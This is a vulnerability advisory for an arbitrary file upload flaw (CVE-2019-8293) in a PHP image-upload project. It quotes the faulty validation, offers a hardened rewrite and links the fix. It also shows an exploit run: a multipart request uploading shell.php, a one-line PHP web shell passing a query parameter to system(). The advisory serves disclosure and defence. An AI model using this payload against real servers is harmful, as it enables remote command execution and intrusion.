Advisory #: 211
Title: Arbitrary file upload vulnerability in upload-image-with-ajax
Author: Larry W. Cashdollar
Date: 2019-12-16
CVE-ID:[CVE-2019-8293]
CWE:
Download Site: https://github.com/abcprintf/upload-image-with-ajax/
Vendor: abcprintf
Vendor Notified: 2019-12-16
Vendor Contact: wh.cprintf@gmail.com
Advisory: http://www.vapidlabs.com/advisory.php?v=211
Description: upload-image-with-ajax
Vulnerability:
The code below sets the $ready flag to true whenever the uploaded file is smaller than 1000000 bytes, which undoes the result of the preceding image-type check. A .php file is therefore accepted with only a warning printed, allowing code execution.

    $ready = false;
    if((($imageType == "image/jpeg") || ($imageType == "image/jpg") || ($imageType == "image/png"))&&in_array($fileExt, $validext)){
        $ready = true;
    }else{
        echo "was not an image ";
        /* You should abort the upload right here */
    }
    if($_FILES["fileUpload"]["size"] < 1000000){
        $ready = true;
        echo "file size is ".$_FILES['fileUpload']["size"]." ";
    }else{
        echo "file was TOO BIG!";
    }
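The following is an added example, not the project's code, showing one way to restructure the check above so that the size test can only reject an upload and can never set $ready on its own; the function name, the $validext allow-list and the uploads path are assumptions.

```php
<?php
// Added example (not the project's code). Each check returns early on
// failure, so no later branch can re-approve a file that was rejected.

const MAX_UPLOAD_BYTES = 1000000;

// Returns null when the upload is acceptable, otherwise the reason to reject it.
function validateUpload(array $file, array $validext): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return 'upload error ' . $file['error'];
    }
    // Size check first; unlike the original it only rejects, never approves.
    if ($file['size'] >= MAX_UPLOAD_BYTES) {
        return 'file was TOO BIG!';
    }
    $fileExt = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($fileExt, $validext, true)) {
        return 'extension not allowed';
    }
    // The Content-Type in the request is attacker-controlled (the exploit
    // sends application/octet-stream); sniff the stored bytes server-side.
    $finfo = finfo_open(FILEINFO_MIME_TYPE);
    $imageType = finfo_file($finfo, $file['tmp_name']);
    finfo_close($finfo);
    if (!in_array($imageType, ['image/jpeg', 'image/png'], true)) {
        return 'was not an image';
    }
    // Belt and braces: a real image decodes; a PHP script does not.
    if (@getimagesize($file['tmp_name']) === false) {
        return 'was not an image';
    }
    return null; // every check passed
}

if (isset($_FILES['fileUpload'])) {
    $validext = ['jpg', 'jpeg', 'png'];            // assumed allow-list
    $reason = validateUpload($_FILES['fileUpload'], $validext);
    if ($reason !== null) {
        http_response_code(400);
        exit($reason);                              // abort before any move
    }
    // Store under a server-generated name with a fixed, allow-listed extension
    // so the client-supplied filename never becomes a path on disk.
    $ext  = strtolower(pathinfo($_FILES['fileUpload']['name'], PATHINFO_EXTENSION));
    $dest = __DIR__ . '/uploads/' . bin2hex(random_bytes(16)) . '.' . $ext; // assumed path
    move_uploaded_file($_FILES['fileUpload']['tmp_name'], $dest);
    echo 'upload successful!';
}
```

Serving the uploads directory with PHP execution disabled (for example, no handler for .php there) limits the impact even if a later check regresses.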
Exploit Code:
$ ./fileupload_exploit 192.168.0.3 80 /upload-image-with-ajax/upload.php fileUpload


POST request size is 482 bytes

Sending Payload:
POST /upload-image-with-ajax/upload.php HTTP/1.1
Host: 192.168.0.3
User-Agent: File Upload Exploiter/v1.2
Accept: */*
Content-Length: 251
Content-Type: multipart/form-data; boundary=------------------------c8e05c8871143853

--------------------------c8e05c8871143853
Content-Disposition: form-data; name="fileUpload"; filename="shell.php"
Content-Type: application/octet-stream

<?php $cmd=$_GET['cmd']; system($cmd);?>

--------------------------c8e05c8871143853--

HTTP/1.1 200 OK
Date: Tue, 24 Dec 2019 12:16:57 GMT
Server: Apache/2.4.25 (Debian)
Vary: Accept-Encoding
Content-Length: 96
Content-Type: text/html; charset=UTF-8

was not an image<br><h2> application/octet-stream</h2>file size is 42<br>upload successful!
[+] Total bytes read: 267
Screen Shots:
Notes:
Author fixed vulnerability:  https://github.com/abcprintf/upload-image-with-ajax/commit/71436ba5102010397519d4b25ea57591cfb4974c